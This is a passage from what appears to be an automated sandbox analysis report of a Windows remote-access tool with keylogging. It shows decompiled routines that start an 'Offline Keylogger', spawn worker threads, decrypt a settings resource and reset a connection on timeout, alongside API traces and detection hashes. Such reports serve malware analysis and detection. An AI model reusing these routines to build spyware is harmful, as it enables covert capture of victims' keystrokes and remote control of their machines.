                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                  • String ID: [DataStart]
                                  • API String ID: 1403384299-3852763199
                                  • Opcode ID: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                  • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                  • Opcode Fuzzy Hash: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                  • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409D3C, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 102sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNEL32(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNEL32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNEL32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409DDC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
                                  • Sleep.KERNEL32(00000BB8), ref: 00409DFA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409E11
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409E2E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409E41
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409E57
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409E60
                                  • exit.MSVCRT ref: 00409E77
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@D@1@@V01@@$CloseOpenQuerySleepValueexit
                                  • String ID: 2.7.2 Pro$override$pth_unenc
                                  • API String ID: 3602623569-3893205188
                                  • Opcode ID: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                  • Instruction ID: 2889bc0b5ca8399aadfd957be20fb2b9bea035d2a19627ad42be5e9aadac3fca
                                  • Opcode Fuzzy Hash: 66a132f25811430172b3037b5f7f4ac2c14d205858bba7e1f82af523167656d2
                                  • Instruction Fuzzy Hash: 2E31B772A50604BBD70477E59C4AEFE776DEF84740F44002AF911971D1DFB8498187AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004129EB, Relevance: 21.1, APIs: 14, Instructions: 85COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6B015DF0), ref: 00412A90
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                  • String ID:
                                  • API String ID: 3435050692-0
                                  • Opcode ID: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                  • Opcode Fuzzy Hash: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                  • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405180, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 71threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 26%
                                  			E00405180(void* __ecx, char _a4) {
				char _v5;
				char _v6;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t29;
				void* _t32;
				char* _t33;
				void* _t36;

				_t19 = __ecx;
				 *((char*)(__ecx + 0x3c)) = 1;
				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
				E00405156(__ecx);
				_t33 = "Offline Keylogger Started";
				if( *0x41b154 != 0x32) {
					_t36 = _t36 - 0x10;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
					E00405DD3(__ecx);
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
				E0041203B();
				CreateThread(0, 0, E0040528A, _t19, 0, 0); // executed
				if( *_t19 == 0) {
					CreateThread(0, 0, E0040526A, _t19, 0, 0); // executed
				}
				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0); // executed
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}












                                  0x00405185
                                  0x00405190
                                  0x00405194
                                  0x0040519c
                                  0x004051a8
                                  0x004051ad
                                  0x004051af
                                  0x004051b9
                                  0x004051c1
                                  0x004051c1
                                  0x004051d0
                                  0x004051e4
                                  0x004051ea
                                  0x00405204
                                  0x00405208
                                  0x00405214
                                  0x00405214
                                  0x00405220
                                  0x00405225
                                  0x0040522f

                                  APIs
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                    • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                  • CreateThread.KERNEL32(00000000,00000000,0040528A,0041B900,00000000,00000000), ref: 00405204
                                  • CreateThread.KERNEL32(00000000,00000000,0040526A,0041B900,00000000,00000000), ref: 00405214
                                  • CreateThread.KERNEL32(00000000,00000000,00405299,0041B900,00000000,00000000), ref: 00405220
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                  • String ID: Offline Keylogger Started$[INFO]
                                  • API String ID: 2375278975-3749928830
                                  • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                  • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                  • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                  • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004027B1, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62sleeptimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 44%
                                  			E004027B1(void* __ecx) {
				char _v5;
				struct _SYSTEMTIME _v24;
				char _v40;
				void* _v56;
				char* _t29;
				char* _t30;
				void* _t38;
				intOrPtr _t46;

				_t38 = __ecx;
				 *((intOrPtr*)(__ecx + 0x40)) = 0;
				if( *((intOrPtr*)(__ecx + 0x3c)) <= 0) {
					L3:
					if( *((intOrPtr*)(_t38 + 0x39)) == 0) {
						_t46 =  *0x41bcac; // 0x0
						if(_t46 != 0) {
							GetLocalTime( &_v24);
							_t29 =  &_v5;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [WARNING] ", _t29, "Timeout expired, resetting connection.\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff);
							_t30 =  &_v40;
							L00414170();
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t30, _t29);
							_t21 = printf(_t30);
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						}
						E004020F4(_t21, _t38);
					}
					L7:
					 *((char*)(_t38 + 0x38)) = 0;
					 *((char*)(_t38 + 0x39)) = 0;
					return 0;
				}
				while( *((intOrPtr*)(_t38 + 0x39)) == 0) {
					Sleep(0x3e8); // executed
					 *(_t38 + 0x40) =  *(_t38 + 0x40) + 1;
					_t21 =  *(_t38 + 0x40);
					if( *(_t38 + 0x40) <  *((intOrPtr*)(_t38 + 0x3c))) {
						continue;
					}
					goto L3;
				}
				goto L7;
			}











                                  0x004027b9
                                  0x004027c0
                                  0x004027c3
                                  0x004027e4
                                  0x004027e7
                                  0x004027e9
                                  0x004027ef
                                  0x004027f5
                                  0x00402812
                                  0x00402820
                                  0x00402827
                                  0x0040282b
                                  0x00402835
                                  0x0040283c
                                  0x00402848
                                  0x00402851
                                  0x00402851
                                  0x00402859
                                  0x00402859
                                  0x0040285e
                                  0x0040285e
                                  0x00402861
                                  0x00402869
                                  0x00402869
                                  0x004027c5
                                  0x004027d3
                                  0x004027d9
                                  0x004027dc
                                  0x004027e2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004027e2
                                  0x00000000

                                  APIs
                                  • Sleep.KERNEL32(000003E8), ref: 004027D3
                                  • GetLocalTime.KERNEL32(?), ref: 004027F5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [WARNING] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 00402820
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040282B
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402835
                                  • printf.MSVCRT ref: 0040283C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402848
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402851
                                  Strings
                                  • %02i:%02i:%02i:%03i [WARNING] , xrefs: 0040281B
                                  • Timeout expired, resetting connection., xrefs: 00402815
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [WARNING] $Timeout expired, resetting connection.
                                  • API String ID: 2756237499-4159561219
                                  • Opcode ID: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                  • Instruction ID: eb574a52e8b17308bab00ba60a15c3ae4eff644db24cd51b069feea48370dafb
                                  • Opcode Fuzzy Hash: 6c118525b0c60a139ccd7d472cd10157555a95a5b55e4d0c4663a8155b7c7e9e
                                  • Instruction Fuzzy Hash: 95119372900758EFCB11EBA4D9898EFB7B9BB48301740447FFA42E3581E6B5A944C768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413FA4, Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x416e50);
				_push(0x414130);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x41c26c =  *0x41c26c | 0xffffffff;
				 *0x41c270 =  *0x41c270 | 0xffffffff;
				 *(__p__fmode()) =  *0x41c264;
				_t24 = __p__commode();
				_t47 =  *0x41c260;
				 *_t24 =  *0x41c260;
				 *0x41c268 = _adjust_fdiv;
				_t27 = E00404F3A( *_adjust_fdiv);
				_t60 =  *0x41b190; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E0041412C);
					_pop(_t47);
				}
				E0041411A(_t27);
				_push(0x41b0e8);
				_push(0x41b0e4);
				L00414114();
				_v112 =  *0x41c25c;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
				_push(0x41b0e0);
				_push(0x41b000); // executed
				L00414114(); // executed
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while(1) {
						__eflags =  *_t54 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				L7:
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t68 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0041410E();
				return _t41;
			}

























                                  0x00413fa7
                                  0x00413fa9
                                  0x00413fae
                                  0x00413fb9
                                  0x00413fba
                                  0x00413fc7
                                  0x00413fcc
                                  0x00413fd1
                                  0x00413fd8
                                  0x00413fdf
                                  0x00413ff2
                                  0x00413ff4
                                  0x00413ffa
                                  0x00414000
                                  0x00414009
                                  0x0041400e
                                  0x00414013
                                  0x00414019
                                  0x00414020
                                  0x00414026
                                  0x00414026
                                  0x00414027
                                  0x0041402c
                                  0x00414031
                                  0x00414036
                                  0x00414040
                                  0x00414059
                                  0x0041405f
                                  0x00414064
                                  0x00414069
                                  0x00414076
                                  0x00414078
                                  0x0041407e
                                  0x004140ba
                                  0x004140ba
                                  0x004140bd
                                  0x00000000
                                  0x00000000
                                  0x004140bf
                                  0x004140c0
                                  0x004140c0
                                  0x00414080
                                  0x00414080
                                  0x00414080
                                  0x00414081
                                  0x00414084
                                  0x00414086
                                  0x00414091
                                  0x00414093
                                  0x00414093
                                  0x00414094
                                  0x00414094
                                  0x00414091
                                  0x00414097
                                  0x00414097
                                  0x0041409b
                                  0x00000000
                                  0x00000000
                                  0x004140a1
                                  0x004140a8
                                  0x004140ae
                                  0x004140b2
                                  0x004140c7
                                  0x004140b4
                                  0x004140b4
                                  0x004140b4
                                  0x004140d3
                                  0x004140d8
                                  0x004140dc
                                  0x004140e2
                                  0x004140e7
                                  0x004140e9
                                  0x004140ec
                                  0x004140ed
                                  0x004140ee
                                  0x004140f5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                  • String ID:
                                  • API String ID: 801014965-0
                                  • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                  • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                  • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409823, Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00409823(intOrPtr _a4) {
				unsigned int _v8;
				signed char* _v12;
				char _v13;
				void* _v20;
				void* _v24;
				char _v40;
				void* _v56;
				char _v1080;
				void* _t36;
				signed int _t38;
				signed int _t42;
				int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t66;
				signed char* _t76;
				void* _t83;
				void* _t88;
				void* _t89;

				_v12 = _v12 & 0x00000000;
				_v8 = E00409D02( &_v12);
				_t51 =  *_v12 & 0x000000ff;
				_t36 = malloc(_t51);
				_t76 = _v12;
				_t54 = _t51;
				_t7 = _t76 + 1; // 0x1
				_t88 = _t7;
				_v24 = _t36;
				_t55 = _t54 >> 2;
				memcpy(_t36, _t88, _t55 << 2);
				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13); // executed
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
				_t83 = malloc(_v8);
				_t42 = _v12;
				_v20 = _t83;
				_t20 = _t42 + 1; // 0x1
				_t89 = _t51 + _t20;
				_t66 = _v8 >> 2;
				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
				E00402F9B( &_v1080, _v24, _t51);
				E0040309E( &_v1080,  &_v40, _v20, _v8);
				free(_v20);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _a4;
			}






















                                  0x0040982c
                                  0x0040983c
                                  0x00409842
                                  0x00409846
                                  0x0040984c
                                  0x00409853
                                  0x00409855
                                  0x00409855
                                  0x0040985a
                                  0x0040985d
                                  0x00409860
                                  0x00409867
                                  0x00409872
                                  0x0040987e
                                  0x00409887
                                  0x00409892
                                  0x0040989e
                                  0x004098a0
                                  0x004098a4
                                  0x004098aa
                                  0x004098aa
                                  0x004098b1
                                  0x004098be
                                  0x004098c6
                                  0x004098db
                                  0x004098e3
                                  0x004098f1
                                  0x004098fa
                                  0x00409907

                                  APIs
                                    • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                    • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                    • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                    • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                  • malloc.MSVCRT ref: 00409846
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                  • malloc.MSVCRT ref: 00409898
